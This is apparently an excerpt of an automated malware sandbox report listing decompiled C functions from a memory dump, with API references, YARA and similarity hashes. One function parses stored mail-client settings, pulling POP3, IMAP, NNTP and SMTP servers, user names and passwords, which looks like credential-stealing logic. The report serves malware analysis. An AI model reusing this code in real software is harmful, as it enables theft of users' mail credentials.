                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileString_mbscmpstrlen
                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                  • API String ID: 3963849919-1658304561
                                                  • Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                  • Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
                                                  • Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                  • Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406278, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406278() {

				if( *0x41711c == 0) {
					0x417118->dwOSVersionInfoSize = 0x94;
					GetVersionExA(0x417118);
				}
				return 0x417118;
			}



                                                  0x00406285
                                                  0x00406288
                                                  0x00406292
                                                  0x00406292
                                                  0x0040629b

                                                  APIs
                                                  • GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Version
                                                  • String ID:
                                                  • API String ID: 1889659487-0
                                                  • Opcode ID: 0048191c24760b141b6f0d3a59878a03bd3f353eaae137afec5afafb810283da
                                                  • Instruction ID: e834d2f23b9aa43ef3af26d4b93615f57df44b07edf01049b3dc0679de2eed13
                                                  • Opcode Fuzzy Hash: 0048191c24760b141b6f0d3a59878a03bd3f353eaae137afec5afafb810283da
                                                  • Instruction Fuzzy Hash: 7DC08C34548220BBC3105F28BC09BC136B8AB0A3A2F01C876E904E6352C3B80C41CBEC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F808, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 99%
                                                  			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406512( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}



















































































































































                                                  0x0040f813
                                                  0x0040f81a
                                                  0x0040f821
                                                  0x0040f828
                                                  0x0040f82f
                                                  0x0040f836
                                                  0x0040f83d
                                                  0x0040f841
                                                  0x0040f845
                                                  0x0040f849
                                                  0x0040f84d
                                                  0x0040f851
                                                  0x0040f855
                                                  0x0040f85f
                                                  0x0040f869
                                                  0x0040f873
                                                  0x0040f87d
                                                  0x0040f887
                                                  0x0040f891
                                                  0x0040f89b
                                                  0x0040f8a5
                                                  0x0040f8af
                                                  0x0040f8b9
                                                  0x0040f8c3
                                                  0x0040f8cd
                                                  0x0040f8d7
                                                  0x0040f8e1
                                                  0x0040f8eb
                                                  0x0040f8f5
                                                  0x0040f8ff
                                                  0x0040f909
                                                  0x0040f913
                                                  0x0040f91d
                                                  0x0040f927
                                                  0x0040f931
                                                  0x0040f93b
                                                  0x0040f945
                                                  0x0040f94f
                                                  0x0040f959
                                                  0x0040f963
                                                  0x0040f96d
                                                  0x0040f977
                                                  0x0040f981
                                                  0x0040f98b
                                                  0x0040f995
                                                  0x0040f99f
                                                  0x0040f9a9
                                                  0x0040f9b3
                                                  0x0040f9bd
                                                  0x0040f9c7
                                                  0x0040f9d1
                                                  0x0040f9db
                                                  0x0040f9e5
                                                  0x0040f9ef
                                                  0x0040f9f9
                                                  0x0040fa03
                                                  0x0040fa0d
                                                  0x0040fa17
                                                  0x0040fa21
                                                  0x0040fa2b
                                                  0x0040fa35
                                                  0x0040fa3f
                                                  0x0040fa49
                                                  0x0040fa53
                                                  0x0040fa5d
                                                  0x0040fa67
                                                  0x0040fa71
                                                  0x0040fa7b
                                                  0x0040fa85
                                                  0x0040fa8f
                                                  0x0040fa99
                                                  0x0040faa3
                                                  0x0040faad
                                                  0x0040fab7
                                                  0x0040fac1
                                                  0x0040facb
                                                  0x0040fad5
                                                  0x0040fadf
                                                  0x0040fae9
                                                  0x0040faf3
                                                  0x0040faf6
                                                  0x0040fafa
                                                  0x0040fafc
                                                  0x0040fb00
                                                  0x0040fb0a
                                                  0x0040fb14
                                                  0x0040fb1e
                                                  0x0040fb28
                                                  0x0040fb32
                                                  0x0040fb3c
                                                  0x0040fb46
                                                  0x0040fb50
                                                  0x0040fb5a
                                                  0x0040fb64
                                                  0x0040fb6e
                                                  0x0040fb78
                                                  0x0040fb82
                                                  0x0040fb8c
                                                  0x0040fb96
                                                  0x0040fba0
                                                  0x0040fbaa
                                                  0x0040fbb1
                                                  0x0040fbb8
                                                  0x0040fbbf
                                                  0x0040fbc6
                                                  0x0040fbcd
                                                  0x0040fbd4
                                                  0x0040fbdb
                                                  0x0040fbe2
                                                  0x0040fbe9
                                                  0x0040fbf0
                                                  0x0040fbf7
                                                  0x0040fde5
                                                  0x0040fde8
                                                  0x0040fdee
                                                  0x0040fdf1
                                                  0x0040fe04
                                                  0x0040fdfd
                                                  0x0040fdfd
                                                  0x00000000
                                                  0x0040fdfd
                                                  0x0040fdf1
                                                  0x0040fbfe
                                                  0x0040fc0d
                                                  0x0040fc10
                                                  0x0040fc14
                                                  0x0040fc17
                                                  0x0040fd94
                                                  0x0040fd98
                                                  0x0040fdd2
                                                  0x0040fdd5
                                                  0x0040fd9e
                                                  0x0040fda1
                                                  0x0040fda6
                                                  0x0040fdaa
                                                  0x0040fdaf
                                                  0x0040fdb6
                                                  0x0040fdb6
                                                  0x0040fdaf
                                                  0x0040fdb8
                                                  0x0040fdb8
                                                  0x0040fdd6
                                                  0x0040fdd7
                                                  0x0040fdd7
                                                  0x0040fdde
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fdde
                                                  0x0040fc1d
                                                  0x0040fc20
                                                  0x0040fc23
                                                  0x0040fc27
                                                  0x0040fc31
                                                  0x0040fc37
                                                  0x0040fc3c
                                                  0x0040fc41
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fc43
                                                  0x0040fc47
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fc49
                                                  0x0040fc51
                                                  0x0040fd5c
                                                  0x0040fd5c
                                                  0x0040fd60
                                                  0x0040fd63
                                                  0x0040fd6b
                                                  0x0040fd73
                                                  0x0040fd7c
                                                  0x0040fd81
                                                  0x0040fd86
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fd88
                                                  0x0040fd8f
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fd91
                                                  0x00000000
                                                  0x0040fd91
                                                  0x0040fdc5
                                                  0x0040fdc8
                                                  0x0040fdc9
                                                  0x00000000
                                                  0x0040fdc9
                                                  0x0040fc57
                                                  0x0040fc57
                                                  0x0040fc5b
                                                  0x0040fc60
                                                  0x0040fd11
                                                  0x0040fd11
                                                  0x0040fd15
                                                  0x0040fd17
                                                  0x0040fd26
                                                  0x0040fd26
                                                  0x0040fd2a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fd1d
                                                  0x0040fd2f
                                                  0x0040fd31
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fd39
                                                  0x0040fd42
                                                  0x0040fd47
                                                  0x0040fd4f
                                                  0x0040fd52
                                                  0x0040fd55
                                                  0x0040fd56
                                                  0x00000000
                                                  0x0040fd56
                                                  0x0040fd1f
                                                  0x0040fd23
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fd25
                                                  0x0040fd25
                                                  0x0040fd2c
                                                  0x00000000
                                                  0x0040fc6f
                                                  0x0040fc6f
                                                  0x0040fc71
                                                  0x0040fc97
                                                  0x0040fc97
                                                  0x0040fc9b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fc8e
                                                  0x0040fd0c
                                                  0x0040fca1
                                                  0x0040fca5
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fcb3
                                                  0x0040fcbb
                                                  0x0040fcc4
                                                  0x0040fcc9
                                                  0x0040fcd4
                                                  0x0040fce3
                                                  0x0040fceb
                                                  0x0040fcec
                                                  0x0040fcf0
                                                  0x0040fcfc
                                                  0x0040fd02
                                                  0x0040fd03
                                                  0x00000000
                                                  0x0040fd03
                                                  0x0040fc90
                                                  0x0040fc94
                                                  0x00000000
                                                  0x00000000
                                                  0x0040fc96
                                                  0x0040fc96
                                                  0x0040fc9d
                                                  0x00000000
                                                  0x0040fc9d
                                                  0x0040fc60
                                                  0x0040fc7c
                                                  0x0040fc82
                                                  0x0040fc83
                                                  0x00000000
                                                  0x0040fc83
                                                  0x00000000

                                                  APIs
                                                  • strlen.MSVCRT ref: 0040FC27
                                                  • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                  • memcpy.MSVCRT ref: 0040FCB3
                                                  • atoi.MSVCRT ref: 0040FCC4
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                  • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                  • API String ID: 1895597112-3210201812
                                                  • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                  • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                  • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                  • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004106BE, Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E004106BE(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				int _t58;
				int _t59;
				int _t60;
				int _t61;
				int _t63;
				void* _t96;
				void* _t99;
				void* _t102;
				void* _t105;
				void* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t123;
				void* _t194;
				void* _t196;
				void* _t201;
				char* _t202;

				_t194 = __edx;
				_t201 = __ecx;
				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
					_t204 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
					_t123 = E00406B74( *_t204);
					_t195 = _t201 + 0xf84;
					E004060D0(0xff, _t201 + 0xf84, _t123);
				}
				_t202 = _t201 + 0x46c;
				if(strcmp(_t202, "POP3_Server") == 0) {
					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t117);
				}
				if(strcmp(_t202, "IMAP_Server") == 0) {
					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t114);
				}
				if(strcmp(_t202, "NNTP_Server") == 0) {
					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t111);
				}
				if(strcmp(_t202, "SMTP_Server") == 0) {
					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1084;
					E004060D0(0xff, _t201 + 0x1084, _t108);
				}
				if(strcmp(_t202, "POP3_User_Name") == 0) {
					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t105);
					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
				}
				if(strcmp(_t202, "IMAP_User_Name") == 0) {
					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t102);
					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
				}
				if(strcmp(_t202, "NNTP_User_Name") == 0) {
					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t99);
					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
				}
				if(strcmp(_t202, "SMTP_User_Name") == 0) {
					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1284;
					E004060D0(0xff, _t201 + 0x1284, _t96);
					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
				}
				_t58 = strcmp(_t202, "POP3_Password2");
				_t214 = _t58;
				if(_t58 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
				}
				_t59 = strcmp(_t202, "IMAP_Password2");
				_t215 = _t59;
				if(_t59 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
				}
				_t60 = strcmp(_t202, "NNTP_Password2");
				_t216 = _t60;
				if(_t60 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
				}
				_t61 = strcmp(_t202, "SMTP_Password2");
				_t217 = _t61;
				if(_t61 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
				}
				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				}
				_t63 = strcmp(_t202, "SMTP_Email_Address");
				if(_t63 == 0) {
					_t203 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
				}
				_push("SMTP_Port");
				_t196 = _t201 + 0x46c;
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x168c) = _t63;
				}
				_push("NNTP_Port");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L35:
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0xf78) = _t63;
				} else {
					_push("IMAP_Port");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L35;
					} else {
						_push("POP3_Port");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L35;
						}
					}
				}
				_push("SMTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x1690) = _t63;
				}
				_push("NNTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L41:
					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				} else {
					_push("IMAP_Secure_Connection");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L41;
					} else {
						_push("POP3_Secure_Connection");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L41;
						}
					}
				}
				return 1;
			}























                                                  0x004106be
                                                  0x004106c2
                                                  0x004106de
                                                  0x004106e0
                                                  0x004106f5
                                                  0x004106fe
                                                  0x00410704
                                                  0x0041070a
                                                  0x0041070f
                                                  0x00410715
                                                  0x00410725
                                                  0x0041072d
                                                  0x00410733
                                                  0x00410739
                                                  0x0041073e
                                                  0x0041074e
                                                  0x00410756
                                                  0x0041075c
                                                  0x00410762
                                                  0x00410767
                                                  0x00410777
                                                  0x0041077f
                                                  0x00410785
                                                  0x0041078b
                                                  0x00410790
                                                  0x004107a0
                                                  0x004107a8
                                                  0x004107ae
                                                  0x004107b4
                                                  0x004107b9
                                                  0x004107c9
                                                  0x004107d1
                                                  0x004107d7
                                                  0x004107dd
                                                  0x004107e3
                                                  0x004107e3
                                                  0x004107fc
                                                  0x00410804
                                                  0x0041080a
                                                  0x00410810
                                                  0x00410816
                                                  0x00410816
                                                  0x0041082f
                                                  0x00410837
                                                  0x0041083d
                                                  0x00410843
                                                  0x00410849
                                                  0x00410849
                                                  0x00410862
                                                  0x0041086a
                                                  0x00410870
                                                  0x00410876
                                                  0x0041087c
                                                  0x0041087c
                                                  0x0041088c
                                                  0x00410891
                                                  0x00410895
                                                  0x004108aa
                                                  0x004108aa
                                                  0x004108b5
                                                  0x004108ba
                                                  0x004108be
                                                  0x004108d3
                                                  0x004108d3
                                                  0x004108de
                                                  0x004108e3
                                                  0x004108e7
                                                  0x004108fc
                                                  0x004108fc
                                                  0x00410907
                                                  0x0041090c
                                                  0x00410910
                                                  0x00410925
                                                  0x00410925
                                                  0x00410939
                                                  0x0041094d
                                                  0x00410952
                                                  0x00410959
                                                  0x00410962
                                                  0x00410964
                                                  0x00410979
                                                  0x0041098e
                                                  0x00410993
                                                  0x00410994
                                                  0x00410999
                                                  0x0041099f
                                                  0x004109a0
                                                  0x004109a9
                                                  0x004109b7
                                                  0x004109bd
                                                  0x004109bd
                                                  0x004109c3
                                                  0x004109c8
                                                  0x004109c9
                                                  0x004109d2
                                                  0x004109f6
                                                  0x00410a02
                                                  0x00410a08
                                                  0x004109d4
                                                  0x004109d4
                                                  0x004109d9
                                                  0x004109da
                                                  0x004109e3
                                                  0x00000000
                                                  0x004109e5
                                                  0x004109e5
                                                  0x004109ea
                                                  0x004109eb
                                                  0x004109f4
                                                  0x00000000
                                                  0x00000000
                                                  0x004109f4
                                                  0x004109e3
                                                  0x00410a0e
                                                  0x00410a13
                                                  0x00410a14
                                                  0x00410a1d
                                                  0x00410a2b
                                                  0x00410a31
                                                  0x00410a31
                                                  0x00410a37
                                                  0x00410a3c
                                                  0x00410a3d
                                                  0x00410a46
                                                  0x00410a6a
                                                  0x00410a7c
                                                  0x00410a48
                                                  0x00410a48
                                                  0x00410a4d
                                                  0x00410a4e
                                                  0x00410a57
                                                  0x00000000
                                                  0x00410a59
                                                  0x00410a59
                                                  0x00410a5e
                                                  0x00410a5f
                                                  0x00410a68
                                                  0x00000000
                                                  0x00000000
                                                  0x00410a68
                                                  0x00410a57
                                                  0x00410a89

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcmp$_stricmp$memcpystrlen
